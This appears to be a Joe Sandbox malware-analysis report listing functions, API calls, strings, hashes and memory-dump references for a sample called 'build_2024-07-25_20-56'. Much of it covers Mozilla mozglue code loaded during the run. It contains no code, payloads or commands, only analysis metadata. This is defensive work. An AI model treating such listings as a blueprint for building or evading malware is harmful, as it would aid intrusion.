Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
Instruction ID: 029a4059ce785aea66ee81bb854fb7a0a454fc3853df5ecaeac7f0707622af9f
Opcode Fuzzy Hash: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
Instruction Fuzzy Hash: ED417FB1A002099FDB24DF99D940AAFF7B9AF44314F11407AEC0AA7381E734DD50CB95

Function 00406780 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,004068D6,?,?,?,?,004068D6,?,?,?,?,00000000), ref: 004067F5

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
Instruction ID: 01cb8937eeb0f68714991e8ebc060aa972990f473894c37eb69bfcd2b7a4d248
Opcode Fuzzy Hash: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
Instruction Fuzzy Hash: 1E110C716041199BD724DF5CD8807A6F3E9FB08308F21493BE54BD7780D23DAC618799

Function 00410D50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 7bad39db7e94d89da705273bb53784c1a132b71b0347305e57ad3879df12df10
Instruction ID: bf07e7dc27ca486ce73a822693bad4f66ee15eaaa84330aa2caf21beff2e0ca4
Opcode Fuzzy Hash: 7bad39db7e94d89da705273bb53784c1a132b71b0347305e57ad3879df12df10
Instruction Fuzzy Hash: C2F0A032A1015CABDB10DA58DC51B9DB3FCDB84701F1082A6BA08E32C0DA706F068B94

Function 00410D10 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 52fb75f6e5fb142ef6efbc5aee5d71601e12b3f1bd5e732dd4866c81e44684d3
Instruction ID: fb15c47bbe0b93a4405a7b8ff06cc38f93f54865058fbad0eae59745ca59ce08
Opcode Fuzzy Hash: 52fb75f6e5fb142ef6efbc5aee5d71601e12b3f1bd5e732dd4866c81e44684d3
Instruction Fuzzy Hash: 92E0867260012817CB10BAE9E8015DA7758DF407B5B44453AF90DEA5D1DB38AEC587C8

Non-executed Functions

Function 6C276C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C276CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C276D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C276D26

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C276D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C276D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C276D73
free.MOZGLUE(00000000), ref: 6C276D80
CertGetNameStringW.CRYPT32 ref: 6C276DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C276DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C276DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C276DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C276E10
CryptMsgClose.CRYPT32(00000000), ref: 6C276E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C276E34
CreateFileW.KERNEL32 ref: 6C276EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C276F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C276F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C27709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C277103
free.MOZGLUE(00000000), ref: 6C277153
CloseHandle.KERNEL32(?), ref: 6C277176
__Init_thread_footer.LIBCMT ref: 6C277209
__Init_thread_footer.LIBCMT ref: 6C27723A
__Init_thread_footer.LIBCMT ref: 6C27726B
__Init_thread_footer.LIBCMT ref: 6C27729C
__Init_thread_footer.LIBCMT ref: 6C2772DC
__Init_thread_footer.LIBCMT ref: 6C27730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C2773C2
VerSetConditionMask.NTDLL ref: 6C2773F3
VerSetConditionMask.NTDLL ref: 6C2773FF
VerSetConditionMask.NTDLL ref: 6C277406
VerSetConditionMask.NTDLL ref: 6C27740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C27741A
moz_xmalloc.MOZGLUE(?), ref: 6C27755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C277568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C277585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C277598
free.MOZGLUE(00000000), ref: 6C2775AC

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C2772C8
(, xrefs: 6C27768A
wintrust.dll, xrefs: 6C2772CD
SHA256, xrefs: 6C276EC0

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: d20757119cd356d7b36f0f4436e4dc767d12cc756c5a14b61b0550a14b9626b3
Instruction ID: b94fade608bff5e8418726fe11a511b72e11bcf7c82eee3e2a17146c91e8f379
Opcode Fuzzy Hash: d20757119cd356d7b36f0f4436e4dc767d12cc756c5a14b61b0550a14b9626b3
Instruction Fuzzy Hash: C352A871A003199FEB62DF64CC88FAA77B9EB49704F104199ED09A7680DB706F84CF61

Function 6C2AF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2AF09B

Part of subcall function 6C285B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2856EE,?,00000001), ref: 6C285B85
Part of subcall function 6C285B50: EnterCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285B90
Part of subcall function 6C285B50: LeaveCriticalSection.KERNEL32(6C2EF688,?,?,?,6C2856EE,?,00000001), ref: 6C285BD8
Part of subcall function 6C285B50: GetTickCount64.KERNEL32 ref: 6C285BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2AF0AC

Part of subcall function 6C285C50: GetTickCount64.KERNEL32 ref: 6C285D40
Part of subcall function 6C285C50: EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C285D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2AF0BE

Part of subcall function 6C285C50: __aulldiv.LIBCMT ref: 6C285DB4
Part of subcall function 6C285C50: LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C285DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C2AF155
GetCurrentThreadId.KERNEL32 ref: 6C2AF1E0
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF1ED
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF212
GetCurrentThreadId.KERNEL32 ref: 6C2AF229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2AF248
GetCurrentThreadId.KERNEL32 ref: 6C2AF2AE
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF2BB
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF2F8

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AF350
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF35D
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF381
GetCurrentThreadId.KERNEL32 ref: 6C2AF398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF3A0
GetCurrentThreadId.KERNEL32 ref: 6C2AF489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF491

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2AF3CF

Part of subcall function 6C2AF070: GetCurrentThreadId.KERNEL32 ref: 6C2AF440
Part of subcall function 6C2AF070: AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF44D
Part of subcall function 6C2AF070: ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2AF4A8
GetCurrentThreadId.KERNEL32 ref: 6C2AF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF561
GetCurrentThreadId.KERNEL32 ref: 6C2AF577
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF585
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6C2AF499
[I %d/%d] profiler_resume, xrefs: 6C2AF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C2AF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C2AF3A8

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 3312aa2d4755d4a93b8422d5c6239f4771f0e0bc75a442914bf84694820c2293
Instruction ID: 97bfacc287644e125ae44f4da89a5b22002580a098570615f5cab877f7f3430a
Opcode Fuzzy Hash: 3312aa2d4755d4a93b8422d5c6239f4771f0e0bc75a442914bf84694820c2293
Instruction Fuzzy Hash: 60D139366043089FDB409FA9E40C76BB7B4EB8F318F544519EE1563BC0DBB54905C7A6

Function 6C2764C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C2764DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C2764F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C276505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C276518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C27652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C27671C
GetCurrentProcess.KERNEL32 ref: 6C276724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C27672F
GetCurrentProcess.KERNEL32 ref: 6C276759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C276764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C276A80
GetSystemInfo.KERNEL32(?), ref: 6C276ABE
__Init_thread_footer.LIBCMT ref: 6C276AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C276AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C276AF7

Strings

nvdxgiwrap.dll, xrefs: 6C276513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C276798
nvd3d9wrap.dll, xrefs: 6C276500
user32.dll, xrefs: 6C276526
detoured.dll, xrefs: 6C2764DA
_etoured.dll, xrefs: 6C2764ED

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: b229414da0540e20e0e79aef127e67f0890c4ee72763cbc1677bae6fd886149b
Instruction ID: e91dac78e2942982ce12210cc90f9c3b98627c9ceebd558e82328f6b657d96cd
Opcode Fuzzy Hash: b229414da0540e20e0e79aef127e67f0890c4ee72763cbc1677bae6fd886149b
Instruction Fuzzy Hash: ADF1927090521E9FDB30CF64CDC8B9AB7B5AF4A319F144199EC19A7681D731AA84CFA0

Function 6C277810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE744), ref: 6C277885
LeaveCriticalSection.KERNEL32(6C2EE744), ref: 6C2778A5
EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C2778AD
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C2778CD
EnterCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2778D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C2778E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C27795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C2779BB
LeaveCriticalSection.KERNEL32(?), ref: 6C277BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C277C82
LeaveCriticalSection.KERNEL32(6C2EE7DC), ref: 6C277CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C277DAF

Strings

D.l, xrefs: 6C27789F
D.l, xrefs: 6C27787F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: D.l$D.l
API String ID: 759993129-4033238276
Opcode ID: 5c9595606734e57fdd3053a5860fde2f6a086e65f26237eea93a97301c077a39
Instruction ID: b866eb6f0c04c8b7e3e0432ce2309d7d74256d029ddc39268d6a3020743f57d4
Opcode Fuzzy Hash: 5c9595606734e57fdd3053a5860fde2f6a086e65f26237eea93a97301c077a39
Instruction Fuzzy Hash: 12027071A0121E8FDB65CF19C984799B7B5FF88718F2582AADC09A7750D730AE90CF90

Function 6C2A7E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C2A7ECF, 6C2A8335
(pre-xul), xrefs: 6C2A7E88
v.l, xrefs: 6C2A8207
schema, xrefs: 6C2A81E3, 6C2A8311
data, xrefs: 6C2A8280, 6C2A83E1

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$v.l
API String ID: 3412268980-2556440188
Opcode ID: 79592404aaa7f40f34ca49389cf95f4c1a50d427400aad985aa3dc89aa3f96e5
Instruction ID: 0217a28073ce28783a12a0188936d58b734b14d1c0abed7c6d7e59083bd09ae9
Opcode Fuzzy Hash: 79592404aaa7f40f34ca49389cf95f4c1a50d427400aad985aa3dc89aa3f96e5
Instruction Fuzzy Hash: DFE19FB1A043488BD710CF68C84065BFBE9BF99314F15892DEC99E7780DBB0ED498B91

Function 6C28D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D4F2
LeaveCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D50B

Part of subcall function 6C26CFE0: EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C26CFF6
Part of subcall function 6C26CFE0: LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C26D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D52E
EnterCriticalSection.KERNEL32(6C2EE7DC), ref: 6C28D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C28D6A6
LeaveCriticalSection.KERNEL32(6C2EE7DC), ref: 6C28D712
LeaveCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C28D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C28D82C
<jemalloc>, xrefs: 6C28D827

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: f11ef794e030b304e8109397c93138de6b59c8482e650ada83f613cc342d6934
Instruction ID: 834974d15b60c8b5b74424dfc8446970091642ffa93370f0a5f5a9298ddf231f
Opcode Fuzzy Hash: f11ef794e030b304e8109397c93138de6b59c8482e650ada83f613cc342d6934
Instruction Fuzzy Hash: A191D071A0571A8FDB54CF29C09472AB7E1EB89314F54892FEC5AD7AC5D730A848CB82

Function 6C2C4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C2C4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C2C4F2E
moz_xmalloc.MOZGLUE ref: 6C2C4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C2C4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C2C52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C2C52E6
Sleep.KERNEL32(00000010), ref: 6C2C5481
free.MOZGLUE(?), ref: 6C2C5498

Strings

(, xrefs: 6C2C5250

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

